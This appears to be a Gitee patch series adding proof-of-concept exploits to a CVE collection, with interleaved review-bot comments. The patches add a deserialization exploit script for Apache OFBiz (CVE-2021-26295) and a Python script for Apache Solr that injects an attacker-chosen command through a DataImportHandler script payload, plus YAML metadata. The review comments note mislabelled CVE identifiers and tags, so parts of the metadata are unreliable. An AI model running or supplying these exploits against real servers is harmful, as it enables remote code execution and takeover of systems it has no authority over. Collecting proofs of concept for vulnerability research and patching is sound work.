From d5a895b930e928d5805d66a156c0bb57079003ef Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 13:35:44 +0000 Subject: [PATCH 01/10] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20apache-OFBiz?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-OFBiz/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-OFBiz/.keep diff --git a/cve/apache-OFBiz/.keep b/cve/apache-OFBiz/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From a32743be4603ad04fff5c0a62f49b43137eaa387 Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 13:35:54 +0000 Subject: [PATCH 02/10] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-OFBiz/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-OFBiz/2021/.keep diff --git a/cve/apache-OFBiz/2021/.keep b/cve/apache-OFBiz/2021/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 1e3ea9b05313d1cf02bf6e9ccc9d0130404db020 Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 13:37:16 +0000 Subject: [PATCH 03/10] CVE-2021-26295 Signed-off-by: MaJiahao --- .../2021/CVE-2021-26295/CVE-2021-26295.py | 28 +++++++++++++++++++ .../2021/CVE-2021-26295/README.md | 4 +++ .../2021/yaml/CVE-2021-26295.yaml | 21 ++++++++++++++ 3 files changed, 53 insertions(+) create mode 100644 cve/apache-OFBiz/2021/CVE-2021-26295/CVE-2021-26295.py create mode 100644 cve/apache-OFBiz/2021/CVE-2021-26295/README.md create mode 100644 cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml diff --git a/cve/apache-OFBiz/2021/CVE-2021-26295/CVE-2021-26295.py b/cve/apache-OFBiz/2021/CVE-2021-26295/CVE-2021-26295.py new file mode 100644 index 00000000..077956e3 --- /dev/null +++ b/cve/apache-OFBiz/2021/CVE-2021-26295/CVE-2021-26295.py 
@@ -0,0 +1,28 @@
+import requests
+import sys
+import subprocess
+import binascii
+from urllib3.exceptions import InsecureRequestWarning
+
+def transfor(content):
+ return binascii.hexlify(content)
+def main():
+ res = subprocess.Popen(['java','-jar', 'ysoserial.jar', "URLDNS", dnslog, '>data.ot'], shell=True)
+ res.wait()
+ with open('data.ot','rb') as f:
+ content = f.read()
+ hex_data = transfor(content)
+ headers = {'Content-Type': 'text/xml'}
+ post_data = '''%s''' % hex_data
+ requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+ try:
+ res = requests.post('%s/webtools/control/SOAPService' % host , data = post_data , headers = headers , verify=False)
+ if res.status_code == 200 :
+ print("[+]Done! check your dnslog: " + dnslog)
+ except:
+ print("[!]Request error!")
+
+if __name__ == '__main__':
+ host = sys.argv[1]
+ dnslog = sys.argv[2]
+ main()
diff --git a/cve/apache-OFBiz/2021/CVE-2021-26295/README.md b/cve/apache-OFBiz/2021/CVE-2021-26295/README.md
new file mode 100644
index 00000000..005b3566
--- /dev/null
+++ b/cve/apache-OFBiz/2021/CVE-2021-26295/README.md
@@ -0,0 +1,4 @@
+# CVE-2021-26295-Apache-OFBiz
+CVE-2021-26295 Apache OFBiz rmi反序列化POC
+
+需要将ysoserial.jar放置在目录下,且不能使用java的高版本
diff --git a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml
new file mode 100644
index 00000000..a50c14b5
--- /dev/null
+++ b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml
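Review bot: The `res = subprocess.Popen([...], shell=True)` line in main() combines a list argument with `shell=True`; on POSIX only the first element (`'java'`) is handed to the shell as the command string and the remaining elements, including the `'>data.ot'` redirection, become positional parameters of the shell itself, so `data.ot` is never written and the following `open('data.ot','rb')` raises FileNotFoundError. Drop the shell and let Python own the output file, e.g. `with open('data.ot', 'wb') as out:` followed by `subprocess.run([...same argument list without '>data.ot'...], stdout=out, check=True)`. `binascii.hexlify` returns bytes, so under Python 3 the `'''%s''' % hex_data` line embeds the `b'...'` repr rather than hex digits; `.decode('ascii')` it first. The bare `except:` around the POST also swallows KeyboardInterrupt and hides the real cause of a failure; catch `requests.RequestException as exc` and print it. `host` and `dnslog` are module globals bound only under `__main__`, which makes main() unusable when imported; passing them as parameters would be the cleaner shape.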
@@ -0,0 +1,21 @@
+id: CVE-2021-26295
+source: https://download.csdn.net/download/weixin_42165508/16093364?utm_medium=distribute.pc_relevant_download.none-task-download-2~default~OPENSEARCH~Rate-16-16093364-download-85129482.dl_default&depth_1-utm_source=distribute.pc_relevant_download.none-task-download-2~default~OPENSEARCH~Rate-16-16093364-download-85129482.dl_default&dest=https%3A%2F%2Fdownload.csdn.net%2Fdownload%2Fweixin_42165508%2F16093364&spm=1003.2020.3001.6616.16
+info:
+ name: Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。
+ severity: critical
+ description:
+ CVE-2021-26295漏洞由RMI反序列化造成的远程代码执行漏洞,攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。
+
+ scope-of-influence:
+ Apache OFBiz < upto 17.12.06
+ reference:
+ - https://blog.csdn.net/weixin_39811856/article/details/115238985
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-26295
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
+ cvss-score: 9.8
+ cve-id: CVE-2021-26295
+ cwe-id: CWE-502
+ cnvd-id: None
+ kve-id: None
+ tags: cve2020, Apache, OFBiz
-- Gitee From 9ad5ee1b92bf8d38a3c8a69301d15c666ab5c2b0 Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 13:37:22 +0000 Subject: [PATCH 04/10] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-OFBiz/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
--- cve/apache-OFBiz/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-OFBiz/2021/.keep
diff --git a/cve/apache-OFBiz/2021/.keep b/cve/apache-OFBiz/2021/.keep
deleted file mode 100644
index e69de29b..00000000 -- Gitee From 68d188df914c428be4f425a9e91c39747bc79148 Mon Sep 17 00:00:00 2001
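Review bot: `tags: cve2020, Apache, OFBiz` on the last line of this hunk tags a 2021 CVE as cve2020, and the same line comes back unchanged when the file is re-added in patch 07 later in this series. `id`, `cve-id` and the NVD reference all say CVE-2021-26295, so `tags: cve2021, Apache, OFBiz` is the value consistent with the rest of the file. `scope-of-influence: Apache OFBiz < upto 17.12.06` mixes two phrasings; `Apache OFBiz < 17.12.06` reads unambiguously. `cnvd-id: None` and `kve-id: None` are the YAML string "None", not a null value; use `null` (or `~`) if anything parses these files.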
From: MaJiahao Date: Sat, 18 Mar 2023 13:37:30 +0000 Subject: [PATCH 05/10] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-OFBiz/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-OFBiz/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-OFBiz/.keep diff --git a/cve/apache-OFBiz/.keep b/cve/apache-OFBiz/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From a5fa1934eacc5effe52b54814ee8342e8a10770c Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 13:38:37 +0000 Subject: [PATCH 06/10] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-OFBiz/2021/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2021/yaml/CVE-2021-26295.yaml | 21 ------------------- 1 file changed, 21 deletions(-) delete mode 100644 cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml diff --git a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml deleted file mode 100644 index a50c14b5..00000000 --- a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml +++ /dev/null 
@@ -1,21 +0,0 @@
-id: CVE-2021-26295
-source: https://download.csdn.net/download/weixin_42165508/16093364?utm_medium=distribute.pc_relevant_download.none-task-download-2~default~OPENSEARCH~Rate-16-16093364-download-85129482.dl_default&depth_1-utm_source=distribute.pc_relevant_download.none-task-download-2~default~OPENSEARCH~Rate-16-16093364-download-85129482.dl_default&dest=https%3A%2F%2Fdownload.csdn.net%2Fdownload%2Fweixin_42165508%2F16093364&spm=1003.2020.3001.6616.16
-info:
- name: Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。
- severity: critical
- description:
- CVE-2021-26295漏洞由RMI反序列化造成的远程代码执行漏洞,攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。
-
- scope-of-influence:
- Apache OFBiz < upto 17.12.06
- reference:
- - https://blog.csdn.net/weixin_39811856/article/details/115238985
- - https://nvd.nist.gov/vuln/detail/CVE-2021-26295
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
- cvss-score: 9.8
- cve-id: CVE-2021-26295
- cwe-id: CWE-502
- cnvd-id: None
- kve-id: None
- tags: cve2020, Apache, OFBiz
-- Gitee From 04fa1ae309e0eacc4fdb721bf6beef51191274ff Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 13:38:51 +0000 Subject: [PATCH 07/10] CVE-2021-26295 Signed-off-by: MaJiahao
--- .../2021/yaml/CVE-2021-26295.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml
diff --git a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml
new file mode 100644
index 00000000..a3752ef6
--- /dev/null
+++ b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml
@@ -0,0 +1,21 @@
+id: CVE-2021-26295
+source: https://download.csdn.net/download/weixin_42165508/16093364?utm_medium=distribute.pc_relevant_download.none-task-download-2~default~OPENSEARCH~Rate-16-16093364-download-85129482.dl_default&depth_1-utm_source=distribute.pc_relevant_download.none-task-download-2~default~OPENSEARCH~Rate-16-16093364-download-85129482.dl_default&dest=https%3A%2F%2Fdownload.csdn.net%2Fdownload%2Fweixin_42165508%2F16093364&spm=1003.2020.3001.6616.16
+info:
+ name: Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。
+ severity: critical
+ description:
+ CVE-2021-26295漏洞由RMI反序列化造成的远程代码执行漏洞,攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。
+
+ scope-of-influence:
+ Apache OFBiz < upto 17.12.06
+ reference:
+ - https://blog.csdn.net/weixin_39811856/article/details/115238985
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-26295
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-26295
+ cwe-id: CWE-502
+ cnvd-id: None
+ kve-id: None
+ tags: cve2020, Apache, OFBiz
-- Gitee From d31499427f5488869d62062814167de13b353880 Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 13:40:45 +0000 Subject: [PATCH 08/10] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
--- cve/apache-solr/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-solr/2019/.keep
diff --git a/cve/apache-solr/2019/.keep b/cve/apache-solr/2019/.keep
new file mode 100644
index 00000000..e69de29b -- Gitee From 62fe229da18399d21f287d4ed381a2852545afaa Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 14:00:08 +0000 Subject: [PATCH 09/10] CVE-2019-0192
Signed-off-by: MaJiahao --- .../2019/CVE-2019-0192/CVE-2019-0192.py | 57 +++++++++++++++++++ cve/apache-solr/2019/CVE-2019-0192/README.md | 10 ++++ cve/apache-solr/2019/yaml/CVE-2019-0192.yaml | 19 +++++++ 3 files changed, 86 insertions(+) create mode 100644 cve/apache-solr/2019/CVE-2019-0192/CVE-2019-0192.py create mode 100644 cve/apache-solr/2019/CVE-2019-0192/README.md create mode 100644 cve/apache-solr/2019/yaml/CVE-2019-0192.yaml diff --git a/cve/apache-solr/2019/CVE-2019-0192/CVE-2019-0192.py b/cve/apache-solr/2019/CVE-2019-0192/CVE-2019-0192.py new file mode 100644 index 00000000..7a8f6cbb --- /dev/null +++ b/cve/apache-solr/2019/CVE-2019-0192/CVE-2019-0192.py 
@@ -0,0 +1,57 @@ +import requests +import json +import sys + + +banner = ''' + ____ _ ____ ____ _____ +/ ___| ___ | |_ __| _ \ / ___| ____| +\___ \ / _ \| | '__| |_) | | | _| + ___) | (_) | | | | _ <| |___| |___ +|____/ \___/|_|_| |_| \_ \____|_____| + +CVE-2019-0193 (Rapid SafeGuard) +''' +print (banner) + +def findcores(url, cmd): + core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json' + r = requests.get(url=core_selector_url) + json_strs = json.loads(r.text) + if r.status_code ==200 and "responseHeader" in r.text: + print ("\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status']))) + for core_selector in json_strs['status']: + coreselector = json_strs['status']['%s'%core_selector]['name'] + print ('\n>>>>The Core Name = %s' % coreselector) + proofofconcept(url,coreselector,cmd) + + else: + print "No core_selector Exit!" + + +def proofofconcept(url,coreselector,cmd): + debug_model_url = url + '/solr/'+ coreselector +'/dataimport?_=1565530241159&indent=on&wt=json' + payload = "command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", + 
"Accept-Encoding":"gzip, deflate", + "Content-type":"application/x-www-form-urlencoded", + "X-Requested-With":"XMLHttpRequest", + "Referer":"http://%s/solr/" % url + + } + r3 = requests.post(url = debug_model_url, data=payload,headers=headers) + print ">>>>> debug_model_url= %s" % debug_model_url + if r3.status_code ==200 and 'Requests' in r3.text: + print ("Exploit Done! Happy Hacking") + else: + print ("No Send Poc Success!") + + + +if __name__ == '__main__': + url = raw_input("Enter IP and Port with http") + cmd = raw_input("Enter command") + findcores(url,cmd) diff --git a/cve/apache-solr/2019/CVE-2019-0192/README.md b/cve/apache-solr/2019/CVE-2019-0192/README.md new file mode 100644 index 00000000..5ccf46b6 --- /dev/null +++ b/cve/apache-solr/2019/CVE-2019-0192/README.md @@ -0,0 +1,10 @@ +# Solr-RCE-CVE-2019-0192 +Apache Solr remote code execution via dataImportHandler + +### Target Solr version: 1.3 – 8.2 +Requirements: DataImportHandler should be enabled, which is not by default. I have tested on version 6.2 + +### python +python solr_RCE.py + + diff --git a/cve/apache-solr/2019/yaml/CVE-2019-0192.yaml b/cve/apache-solr/2019/yaml/CVE-2019-0192.yaml new file mode 100644 index 00000000..067065af --- /dev/null +++ b/cve/apache-solr/2019/yaml/CVE-2019-0192.yaml 
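Review bot: The file mixes Python 2 and Python 3 syntax: `print "No core_selector Exit!"` in the else branch of findcores and `print ">>>>> debug_model_url= %s" % debug_model_url` in proofofconcept are statement-form prints and `raw_input` exists only on Python 2, while the other prints use call form, so under Python 3 the module fails to parse and under Python 2 it runs only because the call-form prints happen to be valid expressions. Convert the two statement prints to `print(...)` and the two `raw_input(...)` calls to `input(...)`, or state the Python 2 requirement in the README. `json_strs = json.loads(r.text)` runs before the status-code check, so any non-JSON reply (an error page, a login redirect) raises ValueError instead of reaching the else branch; parse after the check and inside a `try`. The `Referer` header is built as `"http://%s/solr/" % url` although `url` is read with its scheme already included, which yields `http://http://...`. The banner string names `CVE-2019-0193 (Rapid SafeGuard)` while the file is committed as CVE-2019-0192.py, so one of the two identifiers is wrong.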
@@ -0,0 +1,19 @@
+id: CVE-2019-0192
+source: https://github.com/Rapidsafeguard/Solr-RCE-CVE-2019-0192
+info:
+ name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。
+ severity: critical
+ description:
+ CVE-2019-0192漏洞本质是ConfigAPI允许通过HTTP POST请求配置Solr的JMX服务器。攻击者可以通过ConfigAPI将其配置指向恶意RMI服务器,利用Solr的不安全反序列化来触发Solr端上的远程代码执行。
+ scope-of-influence:
+ Apache Solr 5.0.0 to 5.5.5, 6.0.0 to 6.6.5
+ reference:
+ - https://github.com/mpgn/CVE-2019-0192
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-0192
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2019-0192
+ cnvd-id: None
+ kve-id: None
+ tags: cve2021,Apache,Solr,RCE
-- Gitee From b74ed18d1ae36500a8364dc6bf01e9cb0ed7109f Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 14:00:14 +0000 Subject: [PATCH 10/10] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-solr/2019/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
--- cve/apache-solr/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-solr/2019/.keep
diff --git a/cve/apache-solr/2019/.keep b/cve/apache-solr/2019/.keep
deleted file mode 100644
index e69de29b..00000000 -- Gitee
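Review bot: The metadata in this file and the PoC committed alongside it describe two different vulnerabilities. The `description` here is the ConfigAPI/JMX RMI deserialization issue with `scope-of-influence: Apache Solr 5.0.0 to 5.5.5, 6.0.0 to 6.6.5`, matching the `mpgn/CVE-2019-0192` reference, whereas the README in the same commit says "remote code execution via dataImportHandler" for "Solr version: 1.3 – 8.2" and the script's banner names CVE-2019-0193, which is the DataImportHandler advisory. Either the script and README are filed under the wrong id or this yaml belongs to a different entry; reconcile the two before the entry is merged. `tags: cve2021,Apache,Solr,RCE` also tags a 2019 CVE as cve2021, and the `cwe-id` field that the OFBiz yaml in this series carries is missing here.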